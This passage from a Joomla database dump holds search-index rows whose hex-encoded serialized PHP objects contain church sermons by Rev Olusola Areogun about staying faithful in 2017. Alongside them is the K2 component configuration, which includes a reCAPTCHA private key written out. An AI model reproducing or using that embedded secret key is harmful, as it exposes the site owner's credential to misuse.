6d2c20c2a04a6f6e617468616e2c20c2a0204164616d20616e6420c2a045766520616c6c206c65667420746865697220706c6163657320696e20476f642e20323031372069732061207965617220666f72206d656e20616e6420776f6d656e2077686f2077696c6c2074616b6520746865697220c2a020706c6163657320c2a0616e6420c2a02072656d61696e20c2a020746865726520c2a0207374726f6e676c792c20c2a0666f72636566756c6c7920c2a0706f77657266756c6c7920776974686f757420636f6d70726f6d6973696e672e20c2a05468652073637269707475726520c2a074616c6b73206f66206f6e65206f662044617669642773206d6967687479206d656e2063616c6c6564205368616d6d61722c20c2a074686520736f6e206f66204167656520696e2074686520626f6f6b206f6620322053616d75656c2032333a392077686f2068656c6420c2a06869732067726f756e64206f6e2061206669656c64206f66206c656e74696c73207768656e20746865207068696c697374696e657320c2a02063616d6520616761696e737420c2a049737261656c2c20c2a06f746865727320c2a0666c65642c206275742068652073746f6f64206869732067726f756e6420746865206269626c65207361696420696e20766572736520313220226275742068652073746f6f6420696e20746865206d69647374206f66207468652067726f756e6420616e6420646566656e646564697420616e6420736c657720746865207068696c697374696e657320616e6420746865204c4f524477726f75676874206120677265617420766963746f7279223c2f703e0d0a3c703e48656176656e20697320726561647920746f206261636b207570206d656e20616e6420776f6d656e2077686f207374617920696e20746865697220706c61636520616e64207374616e642074686569722067726f756e64206576656e2069662074686520706f70756c6172207472656e6420697320636f6e74726172792e20506173746f722c207374616e6420c2a0796f757220c2a067726f756e642c20646f6e277420c2a0636f6d70726f6d6973653b20c2a0536f6e2c206b656570206265696e67206120666169746866756c20736f6e2c20646f6e27742074727920746f20757375727020796f7572206661746865727320706c6163653b20c2a0576966652c206b656570206265696e6720666169746866756c2c20796f756e67206d616e2c20c2a0796f756e67206c616479207374616e6420796f757220c2a067726f756e6420c2a0666f7220746865204c6f726420c2a0616e64206b656570206c6f76696e6720c2a048696d2c20c2a05354415920696e20796f757220706c6163652e20546865204c6f7264204a6573757320c2a04368726973742073746179656420696e2048697320706c61636520616e6420746f646179204865206861732061206e616d652061626f766520616c6c206e616d65732e204c75636966657220697320666f726576657220636f6e64656d6e656420c2a0746f20657465726e616c20c2a070756e6973686d656e7420c2a0776974682068697320616e67656c7320c2a0626563617573652074686579206c6566742068697320706c6163652e20446f6e2774206c65742068696d206c75726520796f75206f7574206f66796f757220706c6163652e20c2a05374617920696e20796f757220706c6163652e3c2f703e0d0a3c703e54696c6c206e657874207965617220676f20616e642077696e2077697468204a657375733c2f703e0d0a3c703e476f6427732053657276616e743c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d30372032313a34383a3236223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2233223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33303a2231313a796f752d6d6164652d69742d636f6e67726174756c6174696f6e73223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34383a22636f6d706f6e656e742f6b322f6974656d2f31312d796f752d6d6164652d69742d636f6e67726174756c6174696f6e73223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3131223b733a353a22726f757465223b733a36373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31313a796f752d6d6164652d69742d636f6e67726174756c6174696f6e73223b733a353a227469746c65223b733a32383a22596f75206d61646520697420434f4e47524154554c4154494f4e5321223b733a31313a226465736372697074696f6e223b733a3432383a2220486f7765766572206173207765206d6f766520696e746f20746865206e657720796561722c20492077616e7420746f20656e636f757261676520796f75205354415920494e20594f555220504c414345212e2044455445524d494e4520746f207374617920696e20796f757220706c6163652e2054686572652077696c6c20626520626174746c6573206f66207265706c6163656d656e7420616e6420646973706c6163656d656e742062757420796f75206d757374207374617920696e20796f757220706c6163652e20486f6c6420796f75722067726f756e6420646f6e27742067697665207570206f72206769766520696e20746f2074686520656e656d792e20546865206269626c65207361797320696e2074686520626f6f6b206f662070726f76657262732032373a382c20226c696b652061206269726420746861742077616e64657273206f7574206f662069742773206e65737420736f2069732061206d616e2077686f2077616e64657273206f7574206f662068697320706c61636522207468657265206973206120706c6163652063616c6c65642027796f757220706c616365272c20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312031303a35383a3538223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d30312031303a35383a3538223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(254, 'index.php?option=com_k2&view=item&id=13', 'index.php?option=com_k2&view=item&id=13:father-s-hearth-08-01-2016', 'Father\'s Heart (08/01/2017)', ' Dearly beloved, It is 2017 Mercy! The Lord has spoken expressly to us concerning this year and there has been rain of Impartations upon us. All these impartations and Covenants will mark your life this year despite the situation around you. There might be evil reports but you must hold fast to the words that God has given us in the house for this year. ', '2017-06-25 14:19:30', '6f25080ce2e687c631dc8b2b8331b84d', 1, 1, 1, '*', '2017-01-07 21:48:47', '0000-00-00 00:00:00', '2017-01-07 21:48:47', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223133223b733a353a22616c696173223b733a32363a226661746865722d732d6865617274682d30382d30312d32303136223b733a373a2273756d6d617279223b733a3339373a223c703e3c656d3e3c7374726f6e673e446561726c792062656c6f7665642c3c2f7374726f6e673e3c2f656d3e3c2f703e0d0a3c703e49742069732032303137204d657263792120546865204c6f7264206861732073706f6b656e20657870726573736c7920746f20757320636f6e6365726e696e672074686973207965617220616e6420746865726520686173206265656e207261696e206f6620496d706172746174696f6e732075706f6e2075732e20416c6c20746865736520696d706172746174696f6e7320616e6420436f76656e616e74732077696c6c206d61726b20796f7572206c6966652074686973207965617220646573706974652074686520736974756174696f6e2061726f756e6420796f752e205468657265206d69676874206265206576696c207265706f7274732062757420796f75206d75737420686f6c64206661737420746f2074686520776f726473207468617420476f642068617320676976656e20757320696e2074686520686f75736520666f72207468697320796561722e3c2f703e0d0a223b733a343a22626f6479223b733a333635373a220d0a3c703e54686973207965617220796f75206d75737420686176652074686520726967687420737069726974206472657373696e672e20476f642077696c6c206e6f74206769766520796f75207768617420796f7520617265206e6f7420707265706172656420666f723b2048652077696c6c206769766520796f75206f6e6c79207768617420796f752061726520726561647920666f722e204472657373696e67206973206372756369616c20746f2074696d657320616e6420736561736f6e2e20546865726520697320636f6c6420736561736f6e20647265737320616e6420686f7420736561736f6e2064726573733b206472657373696e67206973206372756369616c20746f206f63636173696f6e733b206472657373696e67206973206372756369616c20746f206576656e74733b206472657373696e672073686f77732077686f20796f75206172653b206472657373696e67207265666c6563747320796f757220706f736974696f6e20616e64207374617475733b206472657373696e67207265666c6563747320706f736974696f6e733b204472657373696e6720616c736f2064657465726d696e657320796f75722070726f74656374696f6e732e20426520636f72726563746c7920647265737365642ec2a03c2f703e0d0a3c703e496e204e756d6265727320636861707465727320313320616e642031342c2043616c656220616e64204a6f736875612068616420746865207269676874206472657373696e6720746f20706f7373657373207768617420746865206f74686572732072616e20617761792066726f6de280957468652050726f6d69736564204c616e642e20546865726520617265207370697269747320796f752077696c6c206e65656420746f2077656172206173206761726d656e747320696e20323031372e2054686973207965617220796f752077696c6c206e6565642074686520666f6c6c6f77696e67206472657373696e67733a3c2f703e0d0a3c703e2d20537069726974206f662041636375726163793a204120737069726974206f6620707265636973696f6e207468617420647261777320796f7520776974682073686172706e65737320746f20776865726520796f7572207468696e6773206172652e20436f6e6365726e696e6720616e79206d61747465722c207468652074776f207468696e677320796f75206e65656420746f20646f2069733a2067657420697420726967687420616e6420676574206265747465722e20446f6ee2809974207370656e64207468652062756c6b206f6620796f75722074696d652067657474696e672069742072696768742c20676574206974207269676874206f6e2074696d6520616e64207468656e206b6565702067657474696e67206265747465722ec2a03c2f703e0d0a3c703e2d20537069726974206f662046616974683a205768656e20746865206f66666572206f6620476f6420636f6d65732c20796f752077696c6c206f6e6c792062652061626c6520746f2074616b6520697420627920796f75722066616974682e20546865726520617265207468726565206b696e6473206f6620666169746820746865204269626c652074616c6b73206f663a206e6f2066616974682c206c6974746c6520666169746820616e642067726561742066616974682e20476f6420676176652075732061206b657920666f72207468697320796561723a20476f64207468726f75676820746865206e616d6573206f66204a657375732062792066616974682e20596f75206d7573742063617272792074686520737069726974206f66206661697468e2809574686174206e61747572652074686174206361757365732061206d616e20746f2062656c69657665206465657020696e7369646520746861742